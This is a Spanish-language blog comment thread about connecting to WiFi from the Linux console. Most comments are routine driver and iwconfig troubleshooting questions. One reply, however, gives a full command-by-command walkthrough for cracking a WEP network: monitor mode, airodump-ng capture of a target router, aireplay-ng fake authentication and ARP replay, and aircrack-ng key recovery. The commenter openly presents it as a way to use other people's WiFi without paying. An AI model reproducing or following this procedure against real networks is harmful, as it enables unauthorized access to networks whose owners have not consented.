12 comentarios el “Conectar Wifi mediante consola

  1. Hey Paco eres de la facultad de Granada si no me esquivoco no? soy tambien de biologia tengo bastantes dudas sobre las auditorias wireless, me manejo un poco en windows pero necesito hacerlo sobre linux (tema de que no hay drivers para el adaptador usb que tengo) me puedes exar una mano, te lo agradeceria

  2. Hola de new ayyy esos examenes como van a salir xD… he descargado wifislax 3.1 y unas 12 horas non stop de lectura sobre auditoria wireless, al final, lo conseguí aunque por gusto de saber hacerlo porque donde estoy tengo wifi pagada, pero bueno esto de que te pique el gusanillo por hacer algo…. de todas formas gracias por haber contestado.
    Por cierto estuve en una de las charlas que diste sobre LyX en el campus. Te dejo el e-mail para exar unos ratos de charla sobre lo que sea, aunque por estas fechas sobra de todo menos tiempo. Suerte y animo con los examenes

    • Amigo, lo primero que necesitas es identificar el chipset de tu wifi, despues buscar los drivers, si wifislax te los detecta perfecto, yo batalle bastante para hacer que mi wifi funcionara, sinceramente aprendi a pillarme algunas wifis que mi pc detectaba, pero al final opte por pagar una wifi, aun que hay casos donde estas de paseo por algun lugar donde hay wifi y digamos que por emergencia ocupas usarla y pues en emergencias es bueno tener conocimientos. ocupas aprender a capturar paquetes con wifislax o con wifiway..se capturan alrededor de 30000 paquetes o mas y usando wifiway se pueden hacer muchas cosas mejor te incluyo el manual de como se hace:

      1.- Poner tarjeta en modo monitor.
      –Abrir Kismes este solo la pondra en modo monitor y creara una ath1

      2.- Obtener Mac Address de la tarjeta de Red desde donde se esta haciendo el monitoreo
      –00:14:6c:c3:xx:xx

      3.- Ejecutar airodump-ng ath1
      –>Tomar la Mac Address, o tambien llamada BSSID de la red que tenga mas PWR en cantidad.
      –>00:21:7c:54:9c:e9
      –>Tomar ESSID … este es el nombre con el cual la maquina detecta la red
      –>MICUENTAWIFI
      –>Tomar el canal(CH) sobre el cual esta operando esta wifi.
      –>Presionar Ctrl + C
      4.- Ejecutar el comando:
      airodump-ng -c 3 -w paqueteswifi ath1

      Donde:
      -c 3 ===>Representa al Canal sobre el que esta operando la red.
      -w Caldopaquetes ==> Es el nombre del archivo sobre el cual se va a escribir el resultado
      de la captura.

      Tambien se puede agregar filtrado para solamente capturar datos desde el router al que queremos
      tener acceso.
      airodump-ng -c 3 -b 00:21:7c:54:xx:xx -w paqueteswifi ath1
      Donde: -b 00:21:7c:54:xx:xx ===> Es la Mac del router al que queremos accesar.

      Nota: En este momento ya estamos capturando trafico, lo que nos falta es hacer algun truco para
      que esta captura se acelere…. seguir los siguientes pasos para ver como se hace esto.

      5.- Debemos generar una falta autenticacion(Authentication)/Asociacion.
      Esto quiere decir que la macaddress de nuestra tarjeta de red entrara falsamente al router
      a donde queremos conectarnos.
      –>Ejecutar el comando:

      aireplay-ng -1 0 -a 00:21:7c:54:xx:xx -h 00:14:6c:c3:xx:xx -e CUENTAWIFI ath1
      Donde:-a 00:21:7c:54:xx:xx==> Mac del Router a donde queremos conectarnos.
      -h 00:14:6c:c3:xx:xx==> Mac de nuestra tarjeta de red wifi.
      -e CUENTAWIFI==>ESSID o nombre de la red a donde queremos conectarnos.
      ath1===> Nombre interna de nuestra tarjeta de red wifi.

      Nota: Ya estando asociados, podremos mandarle trafico al router para que se acelere la captura

      6.- Generar trafico.
      –>Ejecutar el comando:
      aireplay-ng -3 -b 00:21:7c:54:xx:xx -h 00:14:6c:c3:xx:xx ath1
      –>Donde:
      –>-b 00:21:7c:54:xx:xx ===>Es la macaddress del router a donde queremos conectarnos.
      –>-h 00:14:6c:c3:xx:xx ===>Es la macaddress de nuestra tarjeta de red.
      –>ath1 –> Es el nombre interno como se reconoce nuestra tarjeta de red wifi por linux.

      7.- Obtener Web Key.

      –>Ejecutar el comando.
      ==>aircrack-ng paqueteswifi.cap
      –>Seleccionar la macaddress del router al que se desea conectar
      –>Esperar a que salga el webkey

      Ojala esto ayude..

      Salu2 y es la primera vez que publico algo en unforo

  3. Ey Ted llevaba mucho sin pasarme por aqui. Muchas gracias por el aporte y la explicación, ya estuve practicando por diversión, pero me ha venido bien para solucionar unas dudas.

  4. Hola buenas tengo un problemilla y es que al actualizar a lucid lynx no puedo conectarme con wifi ni con wicd ni con network manager, me sale Error: contraseña incorrecta o Error: fallo de autenticación de ip y al poner iwconfig me sale esto en la consola:

    lobo@lobo-laptop:~$ iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    wlan0 IEEE 802.11bg ESSID:”Aldebaran”
    Mode:Managed Frequency:2.422 GHz Access Point: Not-Associated
    Tx-Power=20 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Power Management:off

    si pudieras ayudarme te estaría muy agradecido

  5. hola tengo un pequeño problema espero me puedas ayudar..

    al ingresar la contraseña de la red con el siguiente comando me marca el siguiente error

    iwconfig wlan0 key s:claveASCII
    Error for wireless request “Set Encode” (8B2A) :
    SET failed on device wlan0 ; Invalid argument.

    porque me marca el error.. espero me puedas ayudar…

    gracias de antemano y salu2

Responder

